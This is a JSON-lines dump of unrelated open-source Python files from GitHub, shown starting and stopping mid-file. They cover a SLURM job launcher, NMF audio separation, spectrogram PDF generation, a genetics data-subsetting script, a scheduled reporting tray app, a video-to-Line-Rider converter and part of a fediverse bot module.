print('initializing polarity clues - FINISHED')\n\n\ndef init_subjectivity_clues(subjectivity_path):\n global subjectivity_clues\n print('initializing subjectivity clues...')\n with io.open(subjectivity_path, encoding='utf-8') as file:\n reader = csv.reader(file, delimiter='\\t')\n for line in reader:\n value = 0\n if line[3] == '1':\n value = 1\n elif line[4] == '1':\n value = -1\n subjectivity_clues[line[1]] = value\n print('initializing subjectivity clues - FINISHED')\n","repo_name":"INTER-ACT/ilai","sub_path":"services/shared_ressources.py","file_name":"shared_ressources.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20850704672","text":"import logging\nimport os\nimport time\nimport sys\nfrom pathlib import Path\nfrom typing import Any, List, Set, Sequence\n\nfrom hydra.core.singleton import Singleton\nfrom hydra.core.utils import JobReturn, filter_overrides, JobStatus\nfrom omegaconf import OmegaConf\n\nfrom hydra_plugins.hydra_submitit_launcher.submitit_launcher import SlurmLauncher\nfrom submitit.core.core import Job\nfrom hydra_plugins.hydra_submitit_extension.config import ExtendedSlurmQueueConf\nfrom hydra_plugins.hydra_submitit_extension.utils.slurm_info import QueueInfo\n\nlog = logging.getLogger(__name__)\n\nclass ExtendedSlurmLauncher(SlurmLauncher):\n ACTIVE_JOB_STATES = [\"RUNNING\",\"PENDING\",\"UNKNOWN\"]\n\n def launch(\n self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int\n ) -> Sequence[JobReturn]:\n # lazy import to ensure plugin discovery remains fast\n import submitit\n\n assert self.config is not None\n\n num_jobs = len(job_overrides)\n assert num_jobs > 0\n params = self.params\n # build executor\n init_params = {\"folder\": self.params[\"submitit_folder\"]}\n specific_init_keys = {\"max_num_timeout\"}\n\n init_params.update(\n **{\n f\"{self._EXECUTOR}_{x}\": y\n for x, y in params.items()\n if x in specific_init_keys\n }\n )\n init_keys = specific_init_keys | {\"submitit_folder\"}\n executor = submitit.AutoExecutor(cluster=self._EXECUTOR, **init_params)\n\n # specify resources/parameters\n baseparams = set(OmegaConf.structured(ExtendedSlurmQueueConf).keys())\n params = {\n x if x in baseparams else f\"{self._EXECUTOR}_{x}\": y\n for x, y in params.items()\n if x not in init_keys\n }\n\n # New Parameter for ExtendendSlurmLauncher\n # They need to be removed to not suprise the\n # executor\n extended_slurm_parameter = [ \n \"reschedule_interval\",\n \"max_jobs_in_partition\",\n \"max_jobs_in_total\",\n \"max_jobs_in_sweep\"\n ]\n\n # Dont overrun the scheduler\n assert(params[\"reschedule_interval\"]>=60)\n\n executor_params = {k:v for k, v in params.items() if k not in extended_slurm_parameter}\n\n executor.update_parameters(**executor_params)\n\n log.info(\n f\"Submitit '{self._EXECUTOR}' sweep output dir : \"\n f\"{self.config.hydra.sweep.dir}\"\n )\n sweep_dir = Path(str(self.config.hydra.sweep.dir))\n sweep_dir.mkdir(parents=True, exist_ok=True)\n if \"mode\" in self.config.hydra.sweep:\n mode = int(str(self.config.hydra.sweep.mode), 8)\n os.chmod(sweep_dir, mode=mode)\n\n # Create jobs but do not start them\n job_params: List[Any] = []\n for idx, overrides in enumerate(job_overrides):\n idx = initial_job_idx + idx\n lst = \" \".join(filter_overrides(overrides))\n log.info(f\"\\t#{idx} : {lst}\")\n job_params.append(\n (\n list(overrides),\n \"hydra.sweep.dir\",\n idx,\n f\"job_id_for_{idx}\",\n Singleton.get_state(),\n )\n )\n\n all_jobs: List[Job] = []\n finished_jobs: Set[Job] = set()\n\n while len(job_params)!=0:\n while sum([j.state in self.ACTIVE_JOB_STATES for j in all_jobs ]) < params[\"max_jobs_in_sweep\"]: \n if len(job_params)!=0:\n queue_info = QueueInfo()\n if queue_info.getTotalJobs() < params[\"max_jobs_in_total\"]:\n if queue_info.getJobsInPartition(params[\"partition\"]) < params[\"max_jobs_in_partition\"]:\n jp = job_params.pop(0)\n all_jobs.append(executor.submit(self, *jp))\n log.info(f\"\\t#{jp[2]} : Scheduled\")\n else:\n break\n else:\n break\n # Dont overrun the scheduler\n time.sleep(1)\n else:\n break\n\n for i in set(all_jobs) - finished_jobs: \n if i.state not in self.ACTIVE_JOB_STATES:\n result = i.result()\n if result.status != JobStatus.COMPLETED:\n sys.stderr.write(f\"Error executing job with overrides: {result.overrides}\" + os.linesep)\n raise result._return_value\n finished_jobs.add(i)\n\n time.sleep(params[\"reschedule_interval\"])\n\n return [j.results()[0] for j in all_jobs]\n\n\n","repo_name":"caplett/hydra_submitit_extension","sub_path":"src/hydra_plugins/hydra_submitit_extension/submitit_launcher.py","file_name":"submitit_launcher.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18791582302","text":"import math\nimport numpy as np\nimport torch\nimport scipy\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport librosa\nimport librosa.display\nimport IPython.display as ipd\nfrom scipy.io import wavfile as wf\nimport torchaudio\n\n# Implement NMF for audio source separation here\n\nclass NMF():\n def __init__(self, device, S = 2, beta = 2, max_iter = 100, epsilon = 1e-10, n_fft = 512, hop_length = 256):\n self.device = device\n self.S = S\n self.beta = beta\n self.max_iter = max_iter\n self.epsilon = epsilon\n self.n_fft = n_fft\n self.hop_length = hop_length\n\n def predict(self, X):\n V, angle = self.process(X)\n K = V.shape[0]\n N = V.shape[1]\n W = np.abs(np.random.normal(loc=0, scale = 2.5, size=(K, self.S)))\n H = np.abs(np.random.normal(loc=0, scale = 2.5, size=(self.S, N)))\n\n for i in range(self.max_iter):\n\n if i % 10 == 0:\n print(i // 10)\n \n H = (np.multiply(H, (np.matmul(W.T, np.multiply(np.matmul(W, H)**(self.beta - 2), V))) / (np.matmul(W.T, np.matmul(W, H)**(self.beta - 1))+ 10e-10)))\n W = (np.multiply(W, (np.matmul(np.multiply(np.matmul(W, H)**(self.beta - 2), V), H.T)) / (np.matmul(np.matmul(W, H)**(self.beta - 1), H.T)+ 10e-10)))\n \n S1 = self.separate_source(0, W, H, angle)\n S2 = self.separate_source(1, W, H, angle)\n\n return S1, S2\n \n def process(self, X):\n X_stft = librosa.stft(X, n_fft = self.n_fft, hop_length = self.hop_length)\n X_stft_magnitude = np.abs(X_stft)\n X_stft_angle = np.angle(X_stft)\n V = X_stft_magnitude + self.epsilon\n\n return V, X_stft_angle\n \n def separate_source(self, index, W, H, angle):\n filtered_spectrograms = np.matmul(W[:,[index]], H[[index],:])\n reconstructed_amp = filtered_spectrograms[index] * np.exp(1j * angle)\n reconstructed_audio = librosa.istft(reconstructed_amp, n_fft = self.n_fft, hop_length = self.hop_length)\n \n return reconstructed_audio","repo_name":"longdo16/AudioSeparation","sub_path":"AudioSeparation/NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33432789622","text":"\"\"\"\nSegment\n-------\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport fitz\nimport numpy as np\n\nfrom constant import PDF, SETTINGS\nfrom copy import deepcopy\nfrom datatype.dataset import Dataset\nfrom datatype.imaging import create_image\nfrom datatype.settings import Settings\nfrom datatype.spectrogram import create_spectrogram\nfrom io import BytesIO\nfrom itertools import permutations\nfrom PIL import Image, ImageDraw, ImageFont, ImageOps\nfrom typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n import numpy.typing as npt\n import pandas as pd\n\n from typing_extensions import Any\n\n\ndef create_page(collection: list[Any] | npt.NDArray, text: str) -> Image:\n \"\"\"Create a page with images arranged in a grid.\n\n Args:\n collection: A numpy array containing the images to be put on the page.\n text: The text to be added to the page.\n\n Returns:\n An image representing the page with the images and text.\n\n \"\"\"\n\n padding = y = 150\n length = len(collection)\n\n width, height = np.vectorize(lambda x: x.size)(collection)\n\n width = np.amax(width)\n height = np.amax(height)\n\n height = (height * length) + (padding * length) + y\n\n if width < 500:\n width = 500\n\n grid = Image.new(\n 'L',\n color='white',\n size=(width, height),\n )\n\n for _, image in enumerate(collection):\n x = int(\n (width - image.width) / 2\n )\n\n grid.paste(\n image,\n (x, y)\n )\n\n y = y + image.height + padding\n\n grid = ImageOps.expand(\n grid,\n border=(50, 288),\n fill=(255)\n )\n\n draw = ImageDraw.Draw(grid)\n font = ImageFont.truetype('fonts/times.ttf', 72)\n text_width = draw.textlength(text, font=font)\n\n size = (\n (width + 50 - text_width) // 2,\n 50\n )\n\n draw.text(\n size,\n text,\n (0),\n font=font\n )\n\n return grid\n\n\ndef create_grid(collection: npt.NDArray, text: str) -> Image:\n \"\"\"Create a grid of images.\n\n Args:\n collection: A numpy array containing the images to be put in the grid.\n text: The text to be added to the grid.\n\n Returns:\n An image representing the grid with the images and text.\n\n \"\"\"\n\n column = 5\n padding = 10\n\n row = len(collection) // column\n\n if len(collection) % column:\n row = row + 1\n\n width, height = np.vectorize(lambda x: x.size)(collection)\n maximum_width = np.amax(width) + 10\n maximum_height = np.amax(height) + 10\n\n if maximum_width < 500:\n maximum_width = 500\n\n page_width = maximum_width * column + (padding * column) - padding\n page_height = maximum_height * row + (padding * row) - padding\n\n grid = Image.new(\n 'L',\n color='white',\n size=(page_width, page_height),\n )\n\n x = 0\n y = 0\n\n for index, image in enumerate(collection):\n x_offset = int(\n (maximum_width - image.width) / 2\n )\n\n y_offset = int(\n (maximum_height - image.height) / 2\n )\n\n grid.paste(\n image,\n (x + x_offset, y + y_offset)\n )\n\n x = x + maximum_width + padding\n\n if (index + 1) % column == 0:\n y = y + maximum_height + padding\n x = 0\n\n grid = ImageOps.expand(\n grid,\n border=(20, 100),\n fill=(255)\n )\n\n draw = ImageDraw.Draw(grid)\n font = ImageFont.truetype('fonts/arial.ttf', 32)\n text_width = draw.textlength(text, font=font)\n\n size = (\n (page_width - text_width) // 2,\n 0\n )\n\n draw.text(\n size,\n text,\n (0),\n font=font\n )\n\n return grid\n\n\ndef to_string(method: list[str] | tuple[str, ...]) -> str:\n \"\"\"Convert a list of strings to a single string.\n\n Args:\n method: A list of strings.\n\n Returns:\n A string containing the elements of the input list separated by commas.\n\n \"\"\"\n\n return ', '.join(method)\n\n\ndef resize_image(spectrogram: npt.NDArray) -> Image:\n \"\"\"Resize an image.\n\n Args:\n spectrogram: A numpy array representing the spectrogram image.\n\n Returns:\n The resized image.\n\n \"\"\"\n\n image = create_image(spectrogram)\n flip = ImageOps.flip(image)\n\n width, height = flip.size\n\n width = width * 2\n height = height * 2\n\n return flip.resize(\n (width, height),\n resample=Image.Resampling.BOX\n )\n\n\ndef create_document(subset: pd.DataFrame) -> None:\n \"\"\"Create a document with pages containing grids of images.\n\n Args:\n subset: A pandas DataFrame representing a subset of data.\n\n Returns:\n None.\n\n \"\"\"\n\n individal = subset.folder.iloc[0]\n group = subset.groupby('filename', as_index=False)\n\n document = fitz.open()\n toc = []\n\n path = SETTINGS.joinpath('spectrogram.json')\n settings = Settings.from_file(path)\n\n path = SETTINGS.joinpath('dereverberate.json')\n dereverberate = Settings.from_file(path)\n\n print(f\"Processing: {individal}\")\n\n for index, (filename, column) in enumerate(group, 1):\n setting = column.settings.to_numpy()\n\n callback = {\n 'dereverberate': np.frompyfunc(\n lambda x: x.dereverberate(dereverberate),\n 1,\n 0\n ),\n\n 'filter': np.frompyfunc(\n lambda x, y: x.filter(\n y.butter_lowcut,\n y.butter_highcut\n ),\n 2,\n 0\n ),\n\n 'normalize': np.frompyfunc(\n lambda x: x.normalize(),\n 1,\n 0\n ),\n\n # 'reduce': np.frompyfunc(\n # lambda x: x.reduce(),\n # 1,\n # 0\n # )\n }\n\n methods = permutations([*callback], 3)\n\n collection = []\n\n original = column.segment.to_numpy()\n\n for method in methods:\n print(f\"Applying: {method} to {filename}\")\n\n segment = deepcopy(original)\n filtering = to_string(method)\n\n for function in method:\n if function == 'filter':\n callback[function](segment, setting)\n else:\n callback[function](segment)\n\n spectrogram = np.frompyfunc(\n lambda x, y: create_spectrogram(x, y),\n 2,\n 1\n )(segment, settings)\n\n images = np.frompyfunc(\n lambda x: resize_image(x),\n 1,\n 1\n )(spectrogram)\n\n grid = create_grid(images, filtering)\n collection.append(grid)\n\n page = create_page(collection, filename)\n\n buffer = BytesIO()\n page.save(buffer, format='png')\n\n stream = buffer.getvalue()\n\n # Page\n current = document.new_page(\n width=page.width,\n height=page.height\n )\n\n current.insert_image(\n fitz.Rect(\n 20,\n 0,\n page.width,\n page.height\n ),\n stream=stream,\n keep_proportion=True\n )\n\n # Table of Contents\n item = [1, filename, index]\n toc.append(item)\n\n filename = f\"{individal}_segment.pdf\"\n path = PDF.joinpath(filename)\n\n document.set_toc(toc)\n document.save(path, deflate=True)\n document.close()\n\n\ndef main() -> None:\n dataset = Dataset('segment')\n dataframe = dataset.load()\n\n folders = dataframe.folder.unique()\n\n for folder in folders:\n subset = dataframe[dataframe.folder == folder]\n subset = subset.reset_index()\n subset = subset.copy()\n\n create_document(subset)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"braycarlson/warbler.py","sub_path":"warbler.py/visualization/pdf/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37628826408","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 25 23:21:59 2019\n\n@author: pijacek\n\"\"\"\nimport subprocess\nimport argparse\nparser = argparse.ArgumentParser(\n description='subset eigen dataset with list of population. You must have convertf in the PATH')\nparser.add_argument('-i', '--input', help=\"prefix of input eigen dataset\")\nparser.add_argument('-o', '--output', help=\"prefix of output (subsetted) eigen dataset\")\nparser.add_argument('-p', '--popfile', help=\"a file containing list of populations, one pop per line\")\n\nargs = parser.parse_args()\n\n# assign variables\n\ninfile = args.input\noutfile = args.output\npopfile = args.popfile\nparfile =\"par_subset_{}_to_{}\".format(infile,outfile)\n\n# create parfile\n\nwith open(parfile,\"w\") as outpar:\n outpar.write(\"genotypename: {}.geno\".format(infile) + \"\\n\")\n outpar.write(\"snpname: {}.snp\".format(infile) + \"\\n\")\n outpar.write(\"indivname: {}.ind\".format(infile) + \"\\n\")\n outpar.write(\"outputformat: EIGENSTRAT\" + \"\\n\")\n outpar.write(\"genotypeoutname: {}.geno\".format(outfile) + \"\\n\")\n outpar.write(\"snpoutname: {}.snp\".format(outfile) + \"\\n\")\n outpar.write(\"indivoutname: {}.ind\".format(outfile) + \"\\n\")\n outpar.write(\"poplistname: {}\".format(popfile))\n\n\n# run convertf\nsubprocess.call(\"convertf -p {0} &> log_{0} &\".format(parfile), shell=True)\n","repo_name":"pijacekch/simple_scripts","sub_path":"subset_eigen.py","file_name":"subset_eigen.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2591094968","text":"from PySide2 import QtWidgets, QtGui, QtCore\nfrom PIL import Image\nimport sys\nimport os\nfrom Presentacion import Presentacion_Main\nfrom Presentacion.ui_interface import *\nimport psutil\nimport threading\nimport schedule\nimport time\nfrom pystray import MenuItem, Icon, Menu\nfrom pystray import MenuItem as item\nfrom BLL import BLL_Request\nfrom BLL import BLL_Fecha\nfrom BLL import BLL_Cliente\nfrom BLL import BLL_Informe\nfrom BLL import BLL_Log\nfrom BLL import BLL_Archivo\nfrom DAL import DAL_Conexion\nfrom tqdm import tqdm\n\n\napp = QtWidgets.QApplication(sys.argv)\n\ndef is_already_running():\n current_process = psutil.Process()\n for process in psutil.process_iter():\n try:\n if process.name() == current_process.name() and process.pid != current_process.pid:\n # Hay otro proceso con el mismo nombre en ejecución\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\ndef show_error():\n # Crea una ventana de error\n error_window = QtWidgets.QMessageBox()\n error_window.setWindowTitle(\"Error\")\n error_window.setText(\"Ya hay una instancia de la aplicación en ejecución.\")\n error_window.exec_()\n\n#### -------------------------------------------------core--------------------------------###########\n\ndef hacer_informe(cliente, fecha_inicio, fecha_fin, tipo):\n try:\n informe = BLL_Informe.Informe(fecha_inicio, fecha_fin, cliente, tipo)\n informe.hacerInforme()\n BLL_Log.Log().escribir(\"Se realizo el informe con exito \" , cliente.nombre, \"Informar\")\n except Exception as e:\n BLL_Log.Log().escribir(\"Hubo un problema para hacer el informe, probablemente no hay archivos CSV del cliente, error : \" + str(e), cliente.nombre, \"Error\")\n\n\ndef doInforme(listaCliente):\n fecha = BLL_Fecha.Fecha()\n fechaFin = BLL_Fecha.Fecha().fechaFin()\n print(fecha.fechaInicio(\"diario\"), fechaFin)\n\n \n with tqdm(total=len(listaCliente), desc=\"Procesando clientes\") as pbar_clientes:\n for cliente in listaCliente:\n try:\n # informes mensuales\n if fecha.ahora().day == 1:\n hacer_informe(cliente, fecha.fechaInicio(\"mensual\"), fechaFin, \"mensual\")\n\n # informes semanales (el tipo de informe es mensual ya que todavia no se definio un template diferente para el informe semanal, por lo tanto se usa el mensual)\n if fecha.ahora().weekday() == 4 and cliente.periodicidad == \"1\":\n hacer_informe(cliente, fecha.fechaInicio(\"semanal\"), fechaFin, \"semanal\")\n\n # informes diarios\n if cliente.periodicidad == \"0\":\n hacer_informe(cliente, fecha.fechaInicio(\"diario\"), fechaFin, \"diario\")\n\n BLL_Log.Log().escribir(\"Se generó el informe correctamente\", cliente.nombre, \"Informar\")\n except Exception as e:\n BLL_Log.Log().escribir(\"Hubo algun problema en la creacion de informe \" + str(e), cliente.nombre, \"Error\")\n\n # Actualizar la barra de progreso para el procesamiento de los clientes\n pbar_clientes.update(1)\n\n\ndef doRequest(listaCliente): \n fecha = BLL_Fecha.Fecha()\n semanal = False\n mensual = False\n request = BLL_Request.Request()\n print(\"entre a request\")\n with tqdm(total=len(listaCliente)) as pbar:\n for cliente in listaCliente:\n print(cliente)\n \n try:\n if fecha.ahora().day == 1:\n #lunes = 0, domingo = 6\n if fecha.ahora().weekday() == 4:\n #SE HACEN TODAS LAS REQUESTS\n semanal = True\n mensual = True\n print(\"Hoy es mensual y semanal\")\n else: \n #SE HACEN LAS REQUESTS DIARIAS Y MENSUALES\n mensual = True\n print(\"Hoy es mensual\")\n elif fecha.ahora().weekday() == 4:\n #SE HACEN LAS REQUESTS DIARIAS Y SEMANALES\n semanal = True\n print(\"Hoy es semanal\")\n print(\"Hoy es diario\")\n # se hacen las request correspondientes\n request.ejecutarMapperLectura(fecha, semanal, mensual, cliente)\n BLL_Log.Log().escribir(\"Se realizaron las request de manera correcta \", cliente.nombre, \"Informar\")\n pbar.update(1)\n except Exception as e:\n BLL_Log.Log().escribir(\"Hubo algun problema en las request \" + str(e), cliente.nombre, \"Error\")\n\n\n\ndef doRequestInforme():\n cliente = BLL_Cliente.Cliente()\n listaCliente = cliente.crearListaDB()\n\n # Crear un hilo para ejecutar la función doRequest\n request_thread = threading.Thread(target=doRequest, args=(listaCliente,))\n request_thread.start()\n\n # Crear un hilo para ejecutar la función doInforme\n informe_thread = threading.Thread(target=doInforme, args=(listaCliente,))\n informe_thread.start()\n\n # Esperar a que ambos hilos finalicen\n request_thread.join()\n informe_thread.join()\n\n### -----------------------------------------------------------------------------------##################\n\ndef cleanup():\n # elimina los recursos utilizados por la aplicación\n icon.stop()\n root.deleteLater()\n app.quit()\n\ndef on_open(icon, item):\n root.show()\n root.activateWindow()\n\ndef on_exit(icon, item):\n cleanup()\n\ndef read_scheduleconf():\n with open(os.getcwd() + '//DATA//CONFIG//scheduleconf.txt', 'r') as f:\n scheduleconf = f.read().strip()\n return scheduleconf\n\ndef run_schedule():\n scheduleconf = read_scheduleconf()\n while True:\n current_scheduleconf = read_scheduleconf()\n if current_scheduleconf != scheduleconf:\n # El horario ha sido modificado, actualiza el schedule\n scheduleconf = current_scheduleconf\n schedule.clear()\n schedule.every().day.at(scheduleconf).do(doRequestInforme)\n print(\"Schedule programado para ejecutarse a las\", scheduleconf)\n\n schedule.run_pending()\n time.sleep(1)\n\ndef monitor_scheduleconf():\n file_path = os.getcwd() + '//DATA//CONFIG//scheduleconf.txt'\n last_modified = os.path.getmtime(file_path)\n\n while True:\n time.sleep(1)\n if os.path.getmtime(file_path) > last_modified:\n # El archivo ha sido modificado, reinicia el proceso del schedule\n last_modified = os.path.getmtime(file_path)\n schedule_thread = threading.Thread(target=run_schedule, daemon=True)\n schedule_thread.start()\n'''\ndef run_schedule():\n with open(os.getcwd() + '//DATA//CONFIG//scheduleconf.txt', 'r') as f:\n scheduleconf = f.read().strip()\n \n schedule.every().day.at(scheduleconf).do(doRequestInforme)\n\n print(\"Schedule programado para ejecutarse a las\", scheduleconf)\n \n while True:\n schedule.run_pending()\n time.sleep(1)\n'''\n\ndef main():\n log = BLL_Log.Log()\n print(\"entre a main\")\n #conexion = DAL_Conexion.Conexion().asignarAtributos(**)\n conexion = DAL_Conexion.Conexion()\n if(os.path.exists(os.getcwd() + \"//DATA//CONFIG//Conexion.json\")):\n conexion.leerArchivo()\n if is_already_running():\n print(\"hay una instancia en ejecucion\")\n show_error()\n else:\n # Crea un subproceso para ejecutar el schedule en segundo plano\n schedule_thread = threading.Thread(target=run_schedule, daemon=True)\n schedule_thread.start()\n\n monitor_thread = threading.Thread(target=monitor_scheduleconf, daemon=True)\n monitor_thread.start()\n\n # crea la ventana principal\n global root\n root = Presentacion_Main.App()\n root.show()\n\n # Agrega el ícono y el menú de Pystray\n image = Image.open(os.getcwd() + \"//Presentacion//img//icono.png\") \n menu = (\n item('Abrir', on_open, default=True),\n item('Cerrar', on_exit),\n )\n\n global icon \n icon = Icon(\"Soccrate\", image, \"Soccrate 2.0\", menu)\n icon.run()\n\n cleanup()\n #sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n main()","repo_name":"MusicLab/Automatization","sub_path":"soccrate2.0-test.pyw","file_name":"soccrate2.0-test.pyw","file_ext":"pyw","file_size_in_byte":8293,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33443054759","text":"# quota_management_service.py\r\n\r\nclass QuotaManagementService:\r\n def __init__(self, approval_service):\r\n self.approval_service = approval_service\r\n\r\n def allocate_quota(self, user_id, quota_type, amount):\r\n # Simulate quota allocation\r\n print(f\"Allocating {quota_type} quota: {amount} for User ID: {user_id}\")\r\n return {'status': 'success'}\r\n\r\n def update_quota(self, user_id, quota_type, new_amount):\r\n # Simulate quota update\r\n print(f\"Updating {quota_type} quota: {new_amount} for User ID: {user_id}\")\r\n return {'status': 'success'}\r\n\r\n def enforce_quota(self, user_id, quota_type, requested_amount):\r\n # Simulate quota enforcement\r\n available_quota = 10 # Assume available quota is 10 for this demo\r\n if requested_amount <= available_quota:\r\n print(f\"Quota for {quota_type} request approved for User ID: {user_id}\")\r\n return {'status': 'approved'}\r\n else:\r\n print(f\"Quota for {quota_type} request denied for User ID: {user_id}\")\r\n # Request approval for exceeding quota\r\n approval_status = self.approval_service.approve_request(user_id, 'quota_exceeded', 'Quota exceeded for temporary environments.')\r\n if approval_status['status'] == 'approved':\r\n print(\"Approval received. Overriding quota limit.\")\r\n return {'status': 'approved'}\r\n else:\r\n return {'status': 'denied', 'reason': 'Quota exceeded'}\r\n","repo_name":"RexAgarwal/Cloud_Provisioning_assistant_demo","sub_path":"quota_management_service.py","file_name":"quota_management_service.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10678827379","text":"import random, math, os, sys,json\nfrom track import *\nfrom line import *\nimport cv2, os\nfrom PIL import Image\nMAXRGBFORBLACK = 40\n# VIDEOS ARE SOMETIMES ROTATED WRONG/FLIPPED - NEED TO FIX\nprint(\"Welcome to LRAnimate!\")\n#print(\"WARNING! Ideally only input .mov files as .mp4 files end up with the wrong orientation and mirrored!\")\nfilename = input(\"Please type the name of your video file: \")\nwidth_scaling = int(input(\"please enter the pixel width your would like x to be (recommended 100): \"))\ndistance = int(input(\"Please enter distance between frames (recomend 1000 but up to you): \"))\n\ndef getLines(img,width,height):\n\t\tstart = 0\n\t\tend = 0\n\t\tret = []\n\t\tls = False\n\t\tfor x in range(width):\n\t\t\tif ls == True:\n\t\t\t\tret.append((start,end))\n\t\t\t\tls = False\n\t\t\tfor y in range(height):\n\t\t\t\tif img.getpixel((x,y))[0] < MAXRGBFORBLACK and img.getpixel((x,y))[1] < MAXRGBFORBLACK and img.getpixel((x,y))[2] < MAXRGBFORBLACK:\n\t\t\t\t\tif ls == False:\n\t\t\t\t\t\tls = True\n\t\t\t\t\t\tstart = x,y\n\t\t\t\t\t\tend = x,y\n\t\t\t\t\telse:\n\t\t\t\t\t\tend = x,y\n\t\t\t\t\t\t\n\t\t\t\telif img.getpixel((x,y))[0] > MAXRGBFORBLACK and img.getpixel((x,y))[1] > MAXRGBFORBLACK and img.getpixel((x,y))[2] > MAXRGBFORBLACK and ls == True:\n\t\t\t\t\tret.append((start,end))\n\t\t\t\t\tls = False\n\n\t\treturn ret\n\n\n\n\n\n\n\nframe = \"\"\ntrack = Track()\nc = 0\nPIXELWIDTH = 1\nOFFSET = 0\nvidcap = cv2.VideoCapture(filename)\nsuccess,img = vidcap.read()\n#print((os.path(filename)))\n\nframe = img\n\t\nframe = Image.fromarray(frame)\nif width_scaling == 0:\n\twidth_scaling = frame.width\nwidth = frame.width\nSCALE = width_scaling/width\nwidth_s = width*SCALE\nheight = frame.height\nheight_s = height*SCALE\n\n\n\ncount = 0\nwhile success:\n\t#cv2.imwrite(\"%d.jpg\" % count, image)\t # save frame as JPEG file\t \n\tframe = img\n\t\n\tframe = Image.fromarray(frame)\n\t#print(frame.getpixel((1,2)))\n\n\twidth = frame.width\n\tSCALE = width_scaling/width\n\twidth_s = width*SCALE\n\theight = frame.height\n\theight_s = height*SCALE\n\t#print(width,height)\n\tPIXELWIDTH = SCALE/width\n\t#print(width, height)\n\t#l = getLines(frame, width, height)\n\t\n\tif count == 0:\n\t\tOFFSET += width_s+distance\n\tlines = getLines(frame,width,height)\n#\tfor x,row in enumerate(frame):\n#\t\tfor y,pixel in enumerate(row):\n#\t\t\tif pixel[0] < MAXRGBFORBLACK and pixel[1] < MAXRGBFORBLACK and pixel[2] < MAXRGBFORBLACK:\n#\t\t\t\t#print(x,y)\n#\t\t\t\tx1 = x*SCALE + OFFSET - PIXELWIDTH/2\n#\t\t\t\ty1 = y*SCALE + PIXELWIDTH/2\n#\t\t\t\tx2 = x*SCALE + OFFSET - PIXELWIDTH/2\n#\t\t\t\ty2 = y*SCALE - PIXELWIDTH/2\n#\t\t\t\t#track.addLine(Line(2,c,x1,y1,x2,y2,False,False,False))\n\t\n\t#track.addLine(Line(2,c,x1,y1,x2,y2,False,False,False))\n\tfor n,ln in enumerate(lines):\n\t\tx1 = ln[0][0]*SCALE + OFFSET\n\t\ty1 = ln[0][1]*SCALE\n\t\tx2 = ln[1][0]*SCALE + OFFSET\n\t\ty2 = ln[1][1]*SCALE\n\t\ttrack.addLine(Line(2,n,x1,y1,x2,y2))\n\t\tc += 1\n\tc += 1\n\tOFFSET += width_s+distance\n\tprint(f\"Frame {count} Total Lines: {c}\")\n\n\n\n\n\tsuccess,img = vidcap.read()\n\t#print('Read a new frame: ', success)\n\tcount += 1\n\n# pixel\n# 1,2,3 = red,green,blue\n#print(frames[0][20][30])\n\n\n\n\ntrack.addLine(Line(0,c, -50, height_s, 0, height_s, False,False,False))\ntrack.addLine(Line(0,c+1, 0, height_s, OFFSET, height_s, False,False,False))\n#track.addLine(Line(1,c+2, -50, height, 10, height, False,False,False,2))\n\ntrack.data[\"startPosition\"] = {\"x\":-50,\"y\":height-5}\ntrack.data[\"riders\"][0][\"startPosition\"] = {\"x\":-50,\"y\":height_s-5}\ntrack.data[\"riders\"][0][\"startVelocity\"] = {\"x\":width_s+distance,\"y\":0}\ntrack.saveTrack(filename)\n\nprint(f\"Track Saved as {filename}.json\")","repo_name":"Conqu3red/LRAnimate","sub_path":"Animate.py","file_name":"Animate.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11127132178","text":"#--depends-on rest_api\n\nimport urllib.parse\nfrom src import IRCBot, ModuleManager, utils\nfrom . import ap_actor, ap_security, ap_server, ap_utils\n\ndef _format_username(username, instance):\n return \"@%s@%s\" % (username, instance)\ndef _setting_parse(s):\n username, instance = ap_utils.split_username(s)\n if username and instance:\n return _format_username(username, instance)\n return None\n\n@utils.export(\"botset\", utils.FunctionSetting(_setting_parse,\n \"fediverse-server\", \"The bot's local fediverse server username\",\n example=\"@bot@bitbot.dev\"))\n@utils.export(\"set\", utils.FunctionSetting(_setting_parse, \"fediverse\",\n help=\"Set your fediverse account\", example=\"@gargron@mastodon.social\"))\nclass Module(ModuleManager.BaseModule):\n _name = \"Fedi\"\n\n def on_load(self):\n server_username = self.bot.get_setting(\"fediverse-server\", None)\n if server_username:\n if not \"tls-key\" in self.bot.config:\n raise ValueError(\"`tls-key` not provided in bot config\")\n if not \"tls-certificate\" in self.bot.config:\n raise ValueError(\"`tls-certificate` not provided in bot config\")\n if not ap_security.has_crypto:\n raise ValueError(\"cyprography library is not installed \"\n \"(https://pypi.org/project/cryptography/)\")\n\n server_username, instance = ap_utils.split_username(server_username)\n self.server = ap_server.Server(self.bot, self.exports,\n server_username, instance)\n\n self.events.on(\"api.get.ap-webfinger\").hook(\n self.server.ap_webfinger, authenticated=False)\n self.events.on(\"api.get.ap-user\").hook(\n self.server.ap_user, authenticated=False)\n self.events.on(\"api.post.ap-inbox\").hook(\n self.server.ap_inbox, authenticated=False)\n 